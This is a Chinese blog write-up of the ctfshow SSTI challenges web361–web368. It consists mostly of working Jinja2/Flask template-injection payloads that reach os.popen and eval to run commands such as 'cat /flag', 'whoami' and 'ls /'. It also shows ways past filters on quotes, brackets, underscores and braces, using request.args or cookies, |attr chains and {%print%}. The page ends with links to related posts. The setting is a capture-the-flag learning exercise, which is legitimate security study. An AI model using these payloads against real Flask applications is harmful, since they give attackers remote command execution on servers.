ctfshow web入门 SSTI注入 web361--web368

已于 2024-07-24 21:30:24 修改
阅读量420 收藏 3
点赞数 9
分类专栏: ctfshow 文章标签: 前端 web3 web安全
于 2024-05-15 09:38:27 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_81040377/article/details/138836201
版权

web361

这里转载一篇教绕过方法的文章
hint:考点就是题目
传参?name={{2*2}}回显是4,找到漏洞
说实话这里对py不太好的朋友有点不友好,因为payload都是py的
这里用popen方法来执行命令

?name={{config.__class__.__init__.__globals__['os'].popen('more /flag').read()}}
还有其他的写法但是都是利用的popen

{{().__class__.__bases__[0].__subclasses__()[80].__init__.__globals__.__builtins__['eval']("__import__('os').popen('whoami').read()")}}

web362

上题一样的payload可以用

{{config.__class__.__init__.__globals__['__builtins__'].eval("__import__('os').popen('tac /f*').read()")}}
还是比较简的

web363

这里是把引号过滤了我们可以用

request.args.x

达到目的

?name={{x.__init__.__globals__[request.args.x1].eval(request.args.x2)}}&x1=__builtins__&x2=__import__('os').popen('cat /flag').read()&x=().__class__.__bases__[0].__subclasses__()[80]
config的也可以写

web364

禁用了args我们使用cookie
下面payload中的x是jiaja2框架中的特殊类

?name={{x.__init__.__globals__.__builtins__[request.cookies.x1](request.cookies.x2).read()}}
cookies:
x1=open;x2=/flag
这是原句子但是不能执行命令只能看文件内容
?name={{x.__init__.__globals__.__builtins__[open]('/flag').read()}}
这是另外一种写法
?name={{x.__init__.__globals__[request.cookies.x1].eval(request.cookies.x2)}}
cookie:
x1=__builtins__;x2=__import__('os').popen('cat /flag').read()

?name={{config.__class__.__init__.__globals__[request.cookies.x1].eval(request.cookies.x2)}}
cookie:
x1=__builtins__;x2=__import__('os').popen('tac /f*').read()

?name={{().__class__.__bases__[0].__subclasses__()[80].__init__.__globals__[request.cookies.x1].eval(request.cookies.x2)}}
x1=__builtins__;x2=__import__('os').popen('cat /flag').read()

web365

用魔术方法__getitem__来代替方括号
?name={{x.__init__.__globals__.__getitem__(request.cookies.x1).eval(request.cookies.x2)}}

cookie:
x1=__builtins__;x2=__import__('os').popen('cat /flag').read()

?name={{config.__class__.__init__.__globals__.__getitem__(request.cookies.x1).popen(request.cookies.x2).read()}}
cookie:
x1=os;x2=tac /f*

?name={{config.__class__.__init__.__globals__.__getitem__(request.cookies.x1).eval(request.cookies.x2)}}
cookie:
x1=__builtins__;x2=__import__('os').popen('ls /').read()

web366

过滤了中括号 下划线 单引号 双引号 globals、getitem args
然后使用flask过滤器

?name={{(x|attr(request.cookies.x1)|attr(request.cookies.x2)|attr(request.cookies.x3))(request.cookies.x4).eval(request.cookies.x5)}}
cookie:
x1=__init__;x2=__globals__;x3=__getitem__;x4=__builtins__;x5=__import__('os').popen('cat /flag').read()

?name={{(config|attr(request.cookies.x2)|attr(request.cookies.x3)|attr(request.cookies.x4)|attr(request.cookies.x5))(request.cookies.x1).eval(request.cookies.x6)}}
cookie:
x1=__builtins__;x2=__class__;x3=__init__;x4=__globals__;x5=__getitem__;x6=__import__('os').popen('ls /').read();

""|attr("__class__")
相当于
"".__class__
然后为什么要使用管道符 | 呢,主要就是用来拼接多个命令,然后执行
至于为什么要加给x这一块加括号呢,我觉得其实之前的那些命令都可以加上就能理解了,方便看

web367

上题一样的payload

web368

把双花括号过滤

使用{%print()%}绕过
?name={%print((x|attr(request.cookies.x1)|attr(request.cookies.x2)|attr(request.cookies.x3))(request.cookies.x4).eval(request.cookies.x5))%}
cookie:
x1=__init__;x2=__globals__;x3=__getitem__;x4=__builtins__;x5=__import__('os').popen('cat /flag').read()
baozongwi
关注
专栏目录
web安全-SSTI模板注入漏洞
weixin_61956136的博客
07-31 3687
web安全-SSTI模板注入漏洞
[CTFSHOW][WEB入门]SSTI模版注入
fallingskies
10-14 507
web361 Flask是一个使用Python编写的轻量级web应用框架,其WSGI工具箱采用Werkzeug,模板引擎则使用Jinja2。 参考https://xz.aliyun.com/t/3679#toc-8https://xz.aliyun.com/t/3679#toc-8 使用poc进行测试 {{5*5}} 显然存在模版注入。 查找可以利用的类 {{"".__class__.__bases__[0].__subclasses__()}} 已知<class '...
ctfshow-web361(SSTI)
m0_62094846的博客
04-23 606
看到Hello,猜测输入的参数是name
SSTI模板注入漏洞详解(包含ctfshow web入门361)
T1ngSh0w的博客
03-16 1553
服务端接收了攻击者的恶意输入以后,未经任何处理就将其作为 Web 应用模板内容的一部分,模板引擎在进行目标编译渲染的过程中,执行了攻击者插入的可以破坏模板的语句,从而达到攻击者的目的。
ctfshow web入门 SSTI
最新发布
2401_86043716的博客
08-27 256
从全局变量字典中获取名为popen的变量7.使用Popen类来执行cat /flag命令,这个命令通常用于读取名为flag的文件。8.调用read()方法来读取Popen对象的输出,即cat /flag命令的输出。payload。
[Web安全学习] SSTL模板注入总结
Y1seco的博客
08-18 1532
前置知识 引自 bfengj __class__ 类的一个内置属性,表示实例对象的类。 __base__ 类型对象的直接基类 __bases__ 类型对象的全部基类,以元组形式,类型的实例通常没有属性 __bases__ __mro__ 此属性是由类组成的元组,在方法解析期间会基于它来查找基类。 __subclasses__() 返回这个类的子类集合,Each class keeps a list of w
Ctfshow web入门 SSTI 模板注入web361-web372 详细题解 全
Jay17的博客
08-10 1504
Ctfshow web入门 SSTI 模板注入web361-web372 详细题解 全
ctfshow---web入门---SSTI(361-368
2301_80470992的博客
03-16 478
根据题目给的“名字就是考点”,所以构建playloadstrstrobjectobjectobject[132].__init____init__['popen']popenos.popen。
攻防世界easy_webSSTI注入
m0_66935689的博客
07-29 273
昨天不是放假了嘛想着做几道题的刚好碰到个文件上传的条件竞争整半天头都整大了,网上搜了一下文章质量都参差不齐像我这种菜狗根本看不懂没办法花了两个金币看官方的writeup但还没研究明白就想着做一下其它题把那两个金币挣回来就刚好碰到这玩意。str = '''{{a.__init__.__globals__.__builtins__.eval("__import__('os').popen('ls').read()")}}''' # 原字符串。随便试了一下确定了这玩意会把我们输入的参数当作html解析。
CTF题型 SSTI(1) Flask-SSTI-labs 通关 题记(1)
2401_84009626的博客
04-20 787
可以编码绕过 python解析器支持 hex ,unicode编码 (不建议用base64仅python2支持)建议用nssctf在线 https://www.nssctf.cn/problem/13 直接用。完全可以替换为 request.args.参数名(get方式)用[] 代替 . 其他方法 参考 获取属性的四种方法。尝试写静态文件 请先了解 flask 静态目录概念。以下题目我用简洁的payload 绕过。{{}} 等价于 {%print%}通过过滤器 | join 返回变量。通过 |attr()
ctfshow web入门 命令执行payload
2h4ox1n9
06-15 1745
ctfshow web
ctfshow web入门 ssti web361~web372
qq_62989306的博客
09-13 1372
ssti之数字绕过、request绕过、字符串拼接、chr绕过、反弹绕过、dnslog外带、读文件盲注……
SSTI原理以及ctf.show的SSTI(web361-web362)
wanan的博客
09-30 741
SSTI原理以及ctf.show的SSTI(web361-web362)
Web】Ctfshow SSTI刷题记录1
uuzeray的博客
11-19 1244
题目给到Hint,尝试传?name={{1-1}}测试出ssti注入点。使用{%%}绕过,再借助print()回显。
web入门361~372SSTI
pandasaymmm的博客
03-18 107
SSTI(Server-Side TemplateInjection)服务端模板注入攻击,通过与服务端模板的输入输出交互,在过滤不严格的情况下,构造恶意输入数据,从而达到读取文件或者getshell的目的。
SSTI练习 web361--web372
qing_chuan_的博客
06-15 247
我一步一步试了试,过滤了几个数字2,3等,正好把我可用的os模块没法用了,上网看了好多大佬们的wp可以用全角数字来代替正常数字。这里要提醒我自己一下,这里到用到use_for,自己在哪里拼了半天就是不对。要寄漏,原来过了单双引号啊,当然要用老方法了,request拼接。用subprocess.Popen(),也不行。这题开始过滤了,过了啥,上一题大佬的脚本仍然可以用。哈哈哈,终于到了{}了,直接{%%}+print。加了args过滤,用cookie就好了。上一题全角数字的不能用了。
ctfshow-ssti
weixin_74660472的博客
04-18 378
ssti漏洞原理ssti服务端模板注入ssti主要为python的一些框架 jinja2 mako tornado django,PHP框架smarty twig,java框架jade velocity等等使用了渲染函数时,由于代码不规范或信任了用户输入而导致了服务端模板注入,模板渲染其实并没有漏洞,主要是程序员对代码不规范不严谨造成了模板注入漏洞,造成模板可控。本文着重对flask模板注入进行浅析。morePython对象的继承,用魔术方法一步步找到可利用的方法去执行。即找到父类。
CTFSHOW SSTI
m0_64180167的博客
09-30 256
这里可以使用自定义的变量来绕过 request.values.a 类似于自己定义的变量只需要在}}后面传递参数即可这里是我们需要跑的脚本类型我们需要找到popen来执行命令 我们就可以通过遍历类 然后通过__getitem__找到方法request然后来查询popen写个脚本name="print(i)else:continue跑出来132。
CTFSHOW-SSTI
Monica的博客
11-12 4915
参考文章 SSTI模板注入绕过(进阶篇)_羽的博客-CSDN博客_ssti绕过
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值